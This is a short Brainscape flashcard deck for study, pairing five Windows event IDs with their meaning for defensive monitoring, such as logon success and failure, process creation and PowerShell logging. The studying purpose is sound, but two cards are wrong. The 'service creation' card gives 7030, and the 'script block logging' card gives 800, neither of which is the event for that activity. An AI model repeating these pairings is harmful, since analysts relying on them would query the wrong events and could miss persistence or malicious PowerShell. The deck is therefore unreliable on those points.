Brainscape's Knowledge GenomeTM


Top Flashcards (Certified)
All Flashcards

Cybersecurity > Windows Security Event IDs > Flashcards

Windows Security Event IDs Flashcards

1
Q

4624

A

Logon Success - Good baseline — analyze where/when/how they log in

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

4625

A

Logon Failed - Look for brute force, wrong creds

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

4688

A

Process Creation - Detect malicious binaries, PowerShell, cmd

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

7030

A

Service Creation - Persistence technique (T1543 in MITRE)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

800

A

Powershell Script Block Logging - Needed to see what PowerShell actually did

How well did you know this?
1
Not at all
2
3
4
5
Perfectly

Cybersecurity (23 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2025 Bold Learning Solutions. Terms and Conditions